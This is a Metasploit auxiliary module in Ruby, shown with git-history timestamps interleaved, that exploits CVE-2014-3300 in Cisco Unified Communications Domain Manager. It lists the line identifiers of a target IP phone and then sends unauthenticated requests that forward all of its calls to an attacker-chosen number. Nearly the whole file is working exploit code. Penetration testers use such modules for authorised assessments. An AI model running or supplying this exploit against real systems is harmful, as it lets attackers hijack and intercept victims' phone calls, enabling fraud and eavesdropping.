metasploit-framework/modules/auxiliary/voip/cisco_cucdm_call_forward.rb

146 lines
4.2 KiB
Ruby
Raw Normal View History

##
2015-01-10 06:00:27 +00:00
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rexml/document'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
2015-01-10 06:00:27 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Description' => %q{
2015-01-10 06:02:42 +00:00
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
2015-01-10 07:10:08 +00:00
(CDM) 10 does not properly implement access control, which allows remote attackers to
modify user information. This module exploits the vulnerability to configure unauthorized
2015-01-10 07:10:08 +00:00
call forwarding.
2015-01-10 06:00:27 +00:00
},
'Author' => 'fozavci',
'References' =>
[
['CVE', '2014-3300'],
['BID', '68331']
],
'License' => MSF_LICENSE,
'Actions' =>
[
2015-01-10 06:02:42 +00:00
[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
2015-01-10 06:00:27 +00:00
],
'DefaultAction' => 'Info'
))
register_options(
2015-01-10 06:00:27 +00:00
[
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
])
end
def run
2015-01-10 06:27:31 +00:00
case action.name.upcase
when 'INFO'
get_info
when 'FORWARD'
forward_calls
end
end
def get_info
uri = normalize_uri(target_uri.to_s)
2015-01-10 06:06:26 +00:00
mac = datastore["MAC"]
2016-02-01 22:06:34 +00:00
print_status("Getting fintnumbers and display names of the IP phone")
res = send_request_cgi(
2015-01-10 06:27:31 +00:00
{
'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
'method' => 'GET',
'vars_get' => {
'device' => "SEP#{mac}"
}
})
2015-01-10 06:00:27 +00:00
unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
2016-02-01 22:06:34 +00:00
print_error("Target appears not vulnerable!")
2015-01-10 06:27:31 +00:00
print_status("#{res}")
return []
2015-01-10 06:00:27 +00:00
end
doc = REXML::Document.new(res.body)
lines = []
fint_numbers = []
2015-01-10 06:00:27 +00:00
list = doc.root.get_elements('MenuItem')
2015-01-10 06:00:27 +00:00
list.each do |lst|
xlist = lst.get_elements('Name')
xlist.each {|l| lines << "#{l[0]}"}
xlist = lst.get_elements('URL')
xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
end
2015-01-10 06:00:27 +00:00
lines.size.times do |i|
2016-02-01 22:06:34 +00:00
print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
2015-01-10 06:00:27 +00:00
end
2015-01-10 06:27:31 +00:00
fint_numbers
end
def forward_calls
2015-01-10 06:00:27 +00:00
# for a specific FINTNUMBER redirection
2015-01-10 06:27:31 +00:00
uri = normalize_uri(target_uri.to_s)
forward_to = datastore["FORWARDTO"]
mac = datastore["MAC"]
if datastore['FINTNUMBER']
fint_numbers = [datastore['FINTNUMBER']]
else
fint_numbers = get_info
end
if fint_numbers.empty?
2016-02-01 22:06:34 +00:00
print_error("FINTNUMBER required to forward calls")
2015-01-10 06:27:31 +00:00
return
end
2015-01-10 06:27:31 +00:00
fint_numbers.each do |fintnumber|
2016-02-01 22:06:34 +00:00
print_status("Sending call forward request for #{fintnumber}")
2015-01-10 06:27:31 +00:00
send_request_cgi(
2015-01-10 06:00:27 +00:00
{
2015-01-10 06:27:31 +00:00
'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
'method' => 'GET',
'vars_get' => {
'cfoption' => 'CallForwardAll',
'device' => "SEP#{mac}",
'ProviderName' => 'NULL',
'fintnumber' => "#{fintnumber}",
'telno1' => "#{forward_to}"
}
2015-01-10 06:00:27 +00:00
})
2015-01-10 06:27:31 +00:00
res = send_request_cgi(
2015-01-10 06:00:27 +00:00
{
2015-01-10 06:27:31 +00:00
'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
'method' => 'GET',
'vars_get' => {
'device' => "SEP#{mac}",
'fintnumber' => "#{fintnumber}"
}
2015-01-10 06:00:27 +00:00
})
2015-01-10 06:27:31 +00:00
if res && res.body && res.body && res.body.to_s =~ /CFA/
2016-02-01 22:06:34 +00:00
print_good("Call forwarded successfully for #{fintnumber}")
2015-01-10 06:27:31 +00:00
else
2016-02-01 22:06:34 +00:00
print_status("Call forward failed.")
end
end
end
end